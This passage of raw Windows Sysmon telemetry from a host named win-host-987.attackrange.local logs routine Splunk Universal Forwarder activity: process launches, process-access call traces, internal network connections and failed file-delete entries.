354300x800000000000000035084780Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:06.281{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56651-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084791Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:43.819{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8AF78C03650188A7770CB9F7AD1E3B1,SHA256=15C2C725B447D341911F576924A5642BF20117F5F3F199931D82763CCF912286,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084790Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:43.717{B81B27B7-4E9B-613A-4790-03000000C801}61602936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084789Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:43.573{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E9B-613A-4790-03000000C801}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084788Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:43.573{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084787Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:43.573{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084786Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:43.573{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084785Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:43.573{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084784Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:43.573{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4E9B-613A-4790-03000000C801}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084783Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:43.573{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E9B-613A-4790-03000000C801}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084782Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:43.558{B81B27B7-4E9B-613A-4790-03000000C801}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035084812Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.840{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E9C-613A-4990-03000000C801}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084811Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.840{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4E9C-613A-4990-03000000C801}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084810Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.840{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084809Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.840{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084808Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.840{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084807Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.840{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084806Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.840{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E9C-613A-4990-03000000C801}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084805Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.835{B81B27B7-4E9C-613A-4990-03000000C801}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084804Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.839{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03ED58B24EFCFD8684C8143E306BBAEE,SHA256=E9EFA9246D7D6EE34ED5102B25BE3C7249AA4CB0867CE7AB2259DD71E786547D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084803Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.706{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3FDB786973BA99A20DEBDAE9C611806F,SHA256=09A2B51C527A2C2A3746475B274215D85C8BC16F39C81D6E0E388FCAB71A7EF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084802Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.706{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C50C4CEAADFE6D1ECB0D4B4430D750B,SHA256=1D0EC171A1117731FCC73A665EFFB9D6A4906E06C0C5A8537E82382F134F7EAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084801Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.419{B81B27B7-4E9C-613A-4890-03000000C801}24001224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035084800Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:08.125{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56652-false10.0.1.12-8000- 10341000x800000000000000035084799Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.241{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E9C-613A-4890-03000000C801}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084798Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.241{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084797Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.241{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084796Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.241{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084795Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.241{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084794Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.241{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4E9C-613A-4890-03000000C801}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084793Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.241{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E9C-613A-4890-03000000C801}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084792Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.236{B81B27B7-4E9C-613A-4890-03000000C801}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 